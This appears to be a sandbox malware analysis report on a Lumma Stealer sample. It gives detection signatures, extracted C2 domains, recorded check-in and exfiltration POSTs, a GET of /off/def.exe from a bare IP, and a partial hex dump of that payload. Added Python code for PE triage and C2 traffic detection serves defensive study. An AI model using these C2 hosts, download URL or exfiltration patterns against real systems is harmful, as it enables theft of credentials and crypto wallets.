Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543581
MD5: 65397ed2ae0567709b177f41d0668597
SHA1: 1af8432aef5af0655dc6952fcbac893adae53880
SHA256: ba91baa187e8253acfb92cb60be2a1c99cb9809f4156475bd12a08e6fb69ed06
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

barindex
Source: file.exe Avira: detected
Source: file.exe.4936.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "crisiwarny.store", "necklacedmny.store", "navygenerayk.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Kav--"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: scriptyprefej.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: navygenerayk.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: founpiuer.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: necklacedmny.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: thumbystriw.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: fadehairucw.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: crisiwarny.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: presticitpo.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: 4SD0y4--legendaryy
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088D7F8 CryptUnprotectData, 0_2_0088D7F8
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000003.1733973050.0000000004B70000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch] 0_2_0087EC20
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp ecx 0_2_0088104F
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 0_2_008B4C40
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h] 0_2_0087E1A0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp eax 0_2_008AE210
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah] 0_2_0087CF90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h] 0_2_0089AB20
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h 0_2_0089AB20
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 0_2_00875890
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch] 0_2_008AFC90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp ecx 0_2_008814CE
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h] 0_2_0088E07E
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax 0_2_0087BD50
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h] 0_2_0087BD50
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp ecx 0_2_00898290
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h] 0_2_008B3A90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov word ptr [edx], bp 0_2_00891EC5
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov word ptr [ecx], di 0_2_00891EC5
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp edx 0_2_00878EF0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then and esi, 001FF800h 0_2_00874BA0

Networking

barindex
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49710 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 104.21.95.91:443
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 28 Oct 2024 06:18:42 GMTContent-Type: application/octet-streamContent-Length: 2869760Last-Modified: Mon, 28 Oct 2024 06:09:16 GMTConnection: keep-aliveETag: "671f2a8c-2bca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 ab 54 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 69 73 79 67 77 67 78 00 80 2b 00 00 a0 00 00 00 6a 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 64 72 62 67 61 71 79 00 20 00 00 00 20 2c 00 00 04 00 00 00 a4 2b 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2c 00 00 22 00 00 00 a8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
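The raw response above is the second-stage payload (def.exe): it starts with an MZ/PE header, and the section table readable in the dump carries the names ".rsrc", ".idata  " (with trailing spaces), "aisygwgx", "pdrbgaqy", ".taggant" and one name made entirely of spaces, which is what the "section with special chars", "non-standard names", "entry point outside standard sections" and "invalid checksum" signatures in this report key on. The following is an added example, not part of the sandbox report or of any vendor tool: a small PE32 section-table triage that reproduces those four checks, including the imagehlp checksum algorithm. Only the section names are taken from the dump; the minimal image that build_pe32 assembles around them is constructed for the demonstration and does not reproduce the real payload's layout, entry point or checksum.

```python
"""PE32 section-table triage for the traits flagged in the report.
Added example; not part of the sandbox report or of any vendor tool."""
import struct

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT"}

# Section names readable in the payload dump above. The image that build_pe32
# assembles from them is constructed and is not the real payload's layout.
SAMPLE_SECTIONS = [b"   \x00    ", b".rsrc", b".idata  ", b"aisygwgx",
                   b"pdrbgaqy", b".taggant"]


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """PE image checksum as imagehlp computes it: 32-bit words summed with
    carry folding, the CheckSum field itself skipped, plus the file length."""
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Read the PE32 header fields needed for triage; raises on anything else."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images are handled")
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    checksum_off = opt + 64                                # CheckSum field
    checksum = struct.unpack_from("<I", data, checksum_off)[0]
    sections, pos = [], opt + opt_size
    for _ in range(nsect):
        raw, vsize, va, rsize = struct.unpack_from("<8sIII", data, pos)
        sections.append({"name": raw.rstrip(b"\x00").decode("latin-1"),
                         "va": va, "size": max(vsize, rsize)})
        pos += 40                                          # IMAGE_SECTION_HEADER size
    return {"entry": entry, "checksum": checksum, "checksum_off": checksum_off,
            "sections": sections}


def triage(data: bytes) -> dict:
    """Return the section names plus report-style findings for an image."""
    pe, findings = parse_pe(data), []
    for s in pe["sections"]:
        n = s["name"]
        if not n or any(c.isspace() or not c.isprintable() or ord(c) > 126 for c in n):
            findings.append(f"section with special chars: {n!r}")
        elif n not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {n!r}")
    home = next((s for s in pe["sections"]
                 if s["va"] <= pe["entry"] < s["va"] + s["size"]), None)
    if home is None:
        findings.append(f"entry point 0x{pe['entry']:x} maps to no section")
    elif home["name"] not in STANDARD_SECTIONS:
        findings.append(f"entry point 0x{pe['entry']:x} in section {home['name']!r}")
    expected = pe_checksum(data, pe["checksum_off"])
    if pe["checksum"] != expected:
        findings.append(f"invalid checksum: header 0x{pe['checksum']:x}, "
                        f"computed 0x{expected:x}")
    return {"sections": [s["name"] for s in pe["sections"]], "findings": findings}


def build_pe32(section_names, entry_rva: int, checksum=0) -> bytes:
    """Constructed minimal PE32: DOS header, headers padded to 0x400, then one
    0x200-byte block per section. checksum=None writes a valid checksum."""
    names = [n if isinstance(n, bytes) else n.encode("latin-1") for n in section_names]
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<IIII", opt, 28, 0x400000, 0x1000, 0x200, 0)    # base, alignments
    struct.pack_into("<H", opt, 48, 6)                                # MajorSubsystemVersion
    struct.pack_into("<II", opt, 56, 0x1000 * (len(names) + 1), 0x400)  # SizeOfImage/Headers
    struct.pack_into("<I", opt, 64, checksum or 0)
    struct.pack_into("<H", opt, 68, 2)                                # Windows GUI subsystem
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, 0x200, 0x1000 * (i + 1), 0x200,
                                0x400 + 0x200 * i, 0, 0, 0, 0, 0x60000020)
                    for i, n in enumerate(names))
    image = (dos + b"PE\x00\x00" + coff + bytes(opt) + hdrs).ljust(0x400, b"\x00")
    image += b"\x90" * (0x200 * len(names))
    if checksum is None:                      # patch in the correct value
        off = 0x40 + 4 + 20 + 64
        image = bytearray(image)
        struct.pack_into("<I", image, off, pe_checksum(bytes(image), off))
        image = bytes(image)
    return image
```

`triage(build_pe32(SAMPLE_SECTIONS, 0x4010))` reports the two special-character names, the three non-standard names, the entry point landing in "aisygwgx" and the unset checksum; an image built with conventional names, its entry point in .text and `checksum=None` comes back with no findings. For a real file, pass the bytes read from disk straight to `triage`; the `parse_pe` guard on the PE32 magic is deliberate, since the 64-bit optional header places CheckSum at the same offset but has a different layout after it.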
Source: Joe Sandbox View IP Address: 104.21.95.91 104.21.95.91
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49717 -> 185.215.113.16:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15080Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20247Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569693Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16 (same event repeated 50 times)
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
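The captured requests above show the two stages a detection engineer would want to catch: small form-urlencoded POSTs to /api followed by multipart POSTs to the same C2 host (check-in, then exfiltration), all with a fixed Chrome/119 User-Agent but none of the Accept, Accept-Language or sec-ch-ua headers a real browser sends, plus a GET of /off/def.exe from a bare IP that was never resolved through DNS and that returns an application/octet-stream body beginning with MZ. The following is an added example, not part of the sandbox report or of any vendor rule set: detection logic over HTTP messages reconstructed from those headers. The C2 list is the one the configuration extractor reported above; request bodies are placeholders of the recorded Content-Length because the report does not show their content; the response is truncated after the MZ bytes shown in the dump.

```python
"""Lumma-style C2 and loader traffic detection over reconstructed HTTP messages.
Added example; not part of the sandbox report or of any vendor rule set."""
import ipaddress

# C2 domains from the malware configuration extractor output above
C2_DOMAINS = {"fadehairucw.store", "crisiwarny.store", "necklacedmny.store",
              "navygenerayk.store", "founpiuer.store", "presticitpo.store",
              "thumbystriw.store", "scriptyprefej.store"}
# User-Agent recorded on every request in the capture
CAPTURED_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
# Headers a real Chrome request carries that the captured requests lack
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding", "sec-ch-ua")


def parse_message(raw: bytes) -> dict:
    """Split an HTTP/1.1 request or response into start line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def is_bare_ipv4(host: str) -> bool:
    try:
        return isinstance(ipaddress.ip_address(host), ipaddress.IPv4Address)
    except ValueError:
        return False


def score_request(req: dict) -> list:
    """Return the reasons a request looks like stealer C2 or loader traffic."""
    method, path = req["start"].split(" ")[:2]
    h, reasons = req["headers"], []
    host = h.get("host", "").split(":")[0].lower()
    ctype = h.get("content-type", "")
    if host in C2_DOMAINS:
        reasons.append("host in extracted C2 list")
    if method == "POST" and path == "/api":
        if ctype.startswith("application/x-www-form-urlencoded") and len(req["body"]) < 128:
            reasons.append("small form POST /api (check-in pattern)")
        elif ctype.startswith("multipart/form-data"):
            reasons.append("multipart POST /api (exfiltration pattern)")
    if h.get("user-agent") == CAPTURED_UA and not any(k in h for k in BROWSER_HEADERS):
        reasons.append("browser User-Agent without browser headers")
    if method == "GET" and is_bare_ipv4(host) and path.lower().endswith(".exe"):
        reasons.append("executable fetched from bare IPv4 host")
    return reasons


def response_delivers_pe(resp: dict) -> bool:
    """True when an octet-stream response body starts with an MZ header."""
    ctype = resp["headers"].get("content-type", "")
    return ctype.startswith("application/octet-stream") and resp["body"][:2] == b"MZ"


def summarize_session(requests: list) -> dict:
    """Session verdict: check-in followed by exfiltration to the same host is
    the stealer pattern; a bare-IP .exe fetch is the loader stage."""
    checkin, exfil, loader = set(), set(), False
    for req in requests:
        reasons = score_request(req)
        host = req["headers"].get("host", "").lower()
        checkin |= {host} if "small form POST /api (check-in pattern)" in reasons else set()
        exfil |= {host} if "multipart POST /api (exfiltration pattern)" in reasons else set()
        loader |= "executable fetched from bare IPv4 host" in reasons
    return {"stealer_c2": sorted(checkin & exfil), "loader_download": loader}


def _request(method, path, host, ctype=None, body=b"") -> bytes:
    """Build a request in the shape recorded above (constructed input)."""
    head = f"{method} {path} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    if ctype:
        head += f"Content-Type: {ctype}\r\n"
    head += f"User-Agent: {CAPTURED_UA}\r\n"
    if method == "POST":
        head += f"Content-Length: {len(body)}\r\n"
    head += f"Host: {host}\r\n\r\n"
    return head.encode("latin-1") + body


# Reconstructed from the Networking section; bodies are placeholders of the
# recorded Content-Length because the report does not show their content.
CAPTURED_REQUESTS = [
    _request("POST", "/api", "crisiwarny.store",
             "application/x-www-form-urlencoded", b"?" * 8),
    _request("POST", "/api", "crisiwarny.store",
             "multipart/form-data; boundary=be85de5ipdocierre1", b"?" * 12851),
    _request("GET", "/off/def.exe", "185.215.113.16"),
]
# Start of the recorded response: nginx, octet-stream, body truncated after MZ
CAPTURED_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\n"
                     b"Content-Type: application/octet-stream\r\n"
                     b"Content-Length: 2869760\r\n\r\nMZ\x90\x00\x03\x00\x00\x00")
```

`summarize_session([parse_message(r) for r in CAPTURED_REQUESTS])` yields crisiwarny.store as the stealer C2 and flags the loader download; `response_delivers_pe(parse_message(CAPTURED_RESPONSE))` confirms the fetched object is an executable. The User-Agent check deliberately keys on the missing browser headers rather than the UA string alone, since the UA is a legitimate Chrome value and matching it by itself would fire on real browsers.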
Source: file.exe, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/U
